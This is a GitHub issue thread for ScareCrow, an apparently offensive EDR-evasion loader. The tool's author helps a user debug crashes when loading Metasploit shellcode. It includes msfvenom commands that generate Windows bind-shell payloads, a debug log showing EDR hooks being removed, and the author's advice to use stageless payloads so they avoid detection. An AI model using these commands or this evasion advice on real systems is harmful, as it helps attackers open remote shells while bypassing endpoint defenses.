Comments (10)

Tylous commented on July 22, 2024

I tested with the following and they worked fine in both binary and DLL format.

windows/x64/meterpreter_bind_tcp

windows/x64/meterpreter_reverse_tcp

As for your debug output, the memory address looks blank, which tells me something else went wrong. Since you mentioned that the control loader type worked for you (which is just a fancy DLL), I suspect something else is going on. At any rate, if the control loader worked, I take it I can close this issue?

from scarecrow.

Tylous commented on July 22, 2024

Can you provide me the exact version of Windows you tested on?

0xShkk commented on July 22, 2024

Sure, it was on:

OS Name: Microsoft Windows 10 Enterprise 1909
OS Version: 10.0.18363.1379

Tylous commented on July 22, 2024

I will spin up an instance tonight for testing to see if I can recreate this issue. But I am curious: if you try without the -b '\x00', do you still get the same issue?

Tylous commented on July 22, 2024

So based on my testing, it looks like it's the fact you are using a staged bind shellcode, since a staged shellcode performs the task of downloading and executing the actual shellcode from the listener. The problem here is that the binaries generated from ScareCrow use a different technique from the DLLs, in which the stack pointer for the shellcode string is overwritten with the attributes of an actual executable function, thus when that function is executed the shellcode is executed. Because of the nature of staged payloads, this crashes the process.
I confirmed this works fine with the other modes such as -Loader control, where you can create an executable control panel applet (as this method uses a different technique to execute shellcode). You can also use a stageless version of your shellcode and that will work just fine as well.

Based on my experience, I recommend avoiding staged payloads, as the communication to download the second stage (stage1) shellcode is often IOCed and detected.

I hope this helps?

0xShkk commented on July 22, 2024

Thank you for helping me out.
The loader type control works just well!

Unfortunately, I can't get binary or DLL to work, even with a non-staged shellcode.

0xShkk commented on July 22, 2024

Oh, and regarding your first question: yes, without the badchar definition \x00 it's the same result.

0xShkk commented on July 22, 2024

This is the debug output for a non-staged msf shellcode payload, if it helps:

[DEBUG] [+] Detected Version: 10.0
[DEBUG] [+] Reloading: C:\Windows\System32\kernel32.dll
[DEBUG] [+] Reloading: C:\Windows\System32\kernelbase.dll
[DEBUG] [+] Reloading: C:\Windows\System32\ntdll.dll
[DEBUG] [+] EDR removed
[DEBUG] [*] Create a Pointer on stack
[DEBUG] [*] Loading shellcode into a string
[DEBUG] [*] Copy Pointer's attributes
[DEBUG] [*] Overwriten Pointer to point to shellcode String
Exception 0xc0000005 0x1 0xc03544f54b 0xc00013c013
PC=0xc00013c013

rax     0x3522f400
rbx     0x0
rcx     0xc000122c60
rdi     0xd2bc0d7000
rsi     0x1ed4e1
rbp     0xc000135f78
rsp     0xc000130000
r8      0xc000135d98
r9      0xc000135e28
r10     0x0
r11     0x212
r12     0xffffffffffffffff
r13     0x28
r14     0x27
r15     0xaa
rip     0xc00013c013
rflags  0x10206
cs      0x33
fs      0x53
gs      0x2b

0xShkk commented on July 22, 2024

I do not know if it really makes a difference, but I tried to create shellcode like so:

msfvenom -p windows/x64/shell_bind_tcp LPORT=8888 -f raw -o bind2.raw
msfvenom -p windows/x64/shell_bind_tcp LPORT=8888 -f raw -o bind2.raw -b '\x00'
msfvenom -p windows/x64/shell_bind_tcp EXITFUNC=none LPORT=8888 -f raw -o bind2.raw
msfvenom -p windows/x64/shell_bind_tcp PrependMigrate=true LPORT=8888 -f raw -o bind2.raw
msfvenom -p windows/x64/shell_bind_tcp PrependMigrate=true EXITFUNC=thread LPORT=8888 -f raw -o bind2.raw

None of the above executed successfully via the binary or DLL loader method.

0xShkk commented on July 22, 2024

The DLL loader worked for me now too.
I had to rename the DLL so rundll32 executed the correct one (as you mention in the tool output).

Thank you so much for this great tool and the help!
